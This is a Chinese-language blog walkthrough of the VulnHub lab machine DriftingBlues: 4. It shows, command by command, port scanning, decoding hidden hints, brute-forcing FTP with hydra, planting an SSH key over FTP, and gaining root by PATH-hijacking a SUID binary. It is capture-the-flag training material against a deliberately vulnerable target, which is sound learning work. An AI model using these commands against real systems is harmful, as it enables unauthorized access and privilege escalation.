DRIFTINGBLUES: 4实战演练

DRIFTINGBLUES: 4实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/driftingblues-4,661/

设备名称IP地址
攻击机:kali192.168.2.20
靶机:DRIFTINGBLUES: 4192.168.2.24
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.2.24
# 开放FTP:21端口、SSH:22端口、WEB:80端口
# FTP:21端口版本号为ProFTPD
# SSH:22端口版本号为OpenSSH 7.9p1 Debian 10+deb10u2
# WEB:80端口中间件为Apache httpd 2.4.38

在这里插入图片描述

2、访问网站
http://192.168.2.24/

在这里插入图片描述

3、查看源码
view-source:http://192.168.2.24/
# base64密文:Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09

在这里插入图片描述

4、解密
go back intruder!!! 
tight security drippin
i hope you're an employee
/imfuckingmad.txt

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5、访问网页
http://192.168.2.24/imfuckingmad.txt

在这里插入图片描述

6、解密

解密网站:https://www.splitbrain.org/services/ook

man we are a tech company and still getting hacked??? what the shit??? enough is enough!!! 
/iTiS3Cr3TbiTCh.png

在这里插入图片描述

7、访问网页
http://192.168.2.24//iTiS3Cr3TbiTCh.png

在这里插入图片描述

8、微信扫一扫
https://i.imgur.com/a4JjS76.png
# 得到四个用户名:luther、gary、hubert、clark

在这里插入图片描述

9、爆破FTP
┌──(kali㉿kali)-[~]
└─$ hydra -l hubert -P /home/kali/rockyou.txt ftp://192.168.2.24
# 账号:hubert
# 密码:john316

在这里插入图片描述

10、登录FTP
┌──(kali㉿kali)-[~]
└─$ ftp hubert@192.168.2.24

在这里插入图片描述

11、下载文件并查看
ftp> get sync_log

┌──(kali㉿kali)-[~]
└─$ cat sync_log 

sync:linux同步命令,含义为迫使缓冲块数据立即写盘并更新超级块。

在这里插入图片描述

12、写入SSH密钥并上传
ftp> cd hubert
ftp> mkdir .ssh     
┌──(kali㉿kali)-[~]
└─$ ssh-keygen -f sain    

┌──(kali㉿kali)-[~]
└─$ cp sain.pub ./authorized_keys

ftp> put authorized_keys 

在这里插入图片描述

13、SSH连接
┌──(kali㉿kali)-[~]
└─$ ssh hubert@192.168.2.24 -i sain

在这里插入图片描述

三、后渗透
1、查看第一个flag
hubert@driftingblues:~$ ls -alh
hubert@driftingblues:~$ cat user.txt 

在这里插入图片描述

2、查找权限和SUID文件
hubert@driftingblues:~$ find / -user root -perm /4000 2>/dev/null

在这里插入图片描述

3、查看文件
hubert@driftingblues:~$ /usr/bin/getinfo 

在这里插入图片描述

4、设置变量并运行
hubert@driftingblues:~$ cd /tmp/
hubert@driftingblues:/tmp$ echo '/bin/bash -i' > ip
hubert@driftingblues:/tmp$ chmod +x ip 
hubert@driftingblues:/tmp$ export PATH=/tmp/:$PATH
hubert@driftingblues:/tmp$ getinfo 

在这里插入图片描述

5、查看第二个flag
root@driftingblues:/tmp# cd /root/
root@driftingblues:/root# ls -alh
root@driftingblues:/root# cat root.txt 

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值